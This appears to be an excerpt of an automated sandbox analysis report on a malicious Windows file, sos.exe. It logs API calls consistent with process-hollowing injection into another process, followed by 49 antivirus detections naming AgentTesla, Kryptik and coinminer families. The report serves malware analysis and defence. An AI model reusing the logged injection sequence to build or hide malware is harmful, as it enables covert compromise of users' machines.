WriteProcessMemory June 24, 2021, 10 a.m.	buffer: (@Xpè ¸ È Ø¡Ehh¥E¥E} IDI_ICON1( ~YR~WP ~XQ ~YR~VO{H>a[Ha[[}TM~YR\|NEnj_Y(fa\|e`¯`Z?lh}SKw3'_X\Ue`didfa½d_¢^X`Zz?3~ZS~VOc^Qhcyf`qd_faÄc^~ZS \V~XPw3'a[9e`pb\_aZo`Za[d_¬a\XzA6~ZS~YR\U~YQ_YZ`Zgd^f`¶d^Úb\µ`Z`Z{~[T(`Z}VN~WP·ÿÿ[T=c]f`gaµga¸d^Þd^çd^Ûa[¨\UKj}UM}UNlg`Y5gagb¦ga±ga¹d^Þd^äd_Þd_Í`ZKlh}UM~YR}VOd^Tid\|hcga¥e_Òe`ÏfaÇc^~YR ~\UyC;a[]Wfamidvhcfa¹faÅe_®_Y*b]z?7}UMt%a[>hcwidfa¸faÂb\]s}VN\U~ZRd_]icfa»d^~[U]W\|NFe`_X$ga{e`¬`Z8e`\|LD~WP{J@b\Nb\c}SL~XQ~[T~ZR~ZS~[Uþü?ü?øðàààààððøü?ü?þ h<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x000000014045a000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: base_address: 0x000000014045b000 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
NtGetContextThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000002bc	1	0
WriteProcessMemory June 24, 2021, 10 a.m.	buffer: @ base_address: 0x000007fffffd8010 process_identifier: 1348 process_handle: 0x00000000000002c0	1	1
NtSetContextThread June 24, 2021, 10 a.m.	registers.r14: 0 registers.r15: 0 registers.rcx: 5371108864 registers.rsi: 0 registers.r10: 0 registers.rbx: 0 registers.rsp: 1571096 registers.r11: 0 registers.r8: 0 registers.r9: 0 registers.rip: 1998505216 registers.rdx: 8796092858368 registers.r12: 0 registers.rbp: 0 registers.rdi: 0 registers.rax: 0 registers.r13: 0 thread_handle: 0x00000000000002bc process_identifier: 1348	1	0
NtResumeThread June 24, 2021, 10 a.m.	thread_handle: 0x00000000000002bc suspend_count: 1 process_identifier: 1348	1	0

File has been identified by 49 AntiVirus engines on VirusTotal as malicious (49 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.36947982
CAT-QuickHeal	Trojan.MSIL
McAfee	Artemis!2EDFACC58679
Cylance	Unsafe
Zillya	Trojan.Kryptik.Win32.3227556
Sangfor	Trojan.Win32.Generic.ky
K7AntiVirus	Trojan ( 0057c5721 )
Alibaba	Trojan:MSIL/AgentTesla.b348681b
K7GW	Trojan ( 0057c5721 )
Cybereason	malicious.ca8c78
Cyren	W64/MSIL_Kryptik.EPD.gen!Eldorado
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of MSIL/Kryptik.AAWO
TrendMicro-HouseCall	TROJ_GEN.R002C0DEP21
Avast	Win64:CoinminerX-gen [Trj]
Kaspersky	HEUR:Trojan.Win32.Generic
BitDefender	Trojan.GenericKD.36947982
Paloalto	generic.ml
Tencent	Msil.Trojan.Cryptos.Hwdr
Ad-Aware	Trojan.GenericKD.36947982
Emsisoft	Trojan.GenericKD.36947982 (B)
DrWeb	Trojan.PackedNET.721
VIPRE	Trojan.Win32.Generic!BT
TrendMicro	TROJ_GEN.R002C0DEP21
McAfee-GW-Edition	BehavesLike.Win64.VirRansom.tc
SentinelOne	Static AI - Malicious PE
FireEye	Generic.mg.2edfacc58679637e
Sophos	Mal/Generic-R + Troj/Kryptik-XQ
APEX	Malicious
GData	Trojan.GenericKD.36947982
Avira	TR/Kryptik.orgox
MAX	malware (ai score=80)
Arcabit	Trojan.Generic.D233C80E
ViRobot	Trojan.Win32.Z.Wacatac.2008576
Microsoft	Trojan:MSIL/AgentTesla.FR!MTB
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.C4463109
VBA32	Trojan.MSIL.Cryptos
ALYac	Trojan.GenericKD.36947982
Malwarebytes	Malware.AI.4217549053
Rising	Trojan.Kryptik/MSIL!1.D6FC (CLASSIC)
Ikarus	Trojan.MSIL.Crypt
eGambit	Unsafe.AI_Score_98%
Fortinet	MSIL/GenKryptik.FFBT!tr
MaxSecure	Trojan.Malware.9817250.susgen
AVG	Win64:CoinminerX-gen [Trj]
Panda	Trj/CI.A
CrowdStrike	win/malicious_confidence_80% (W)

sos.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All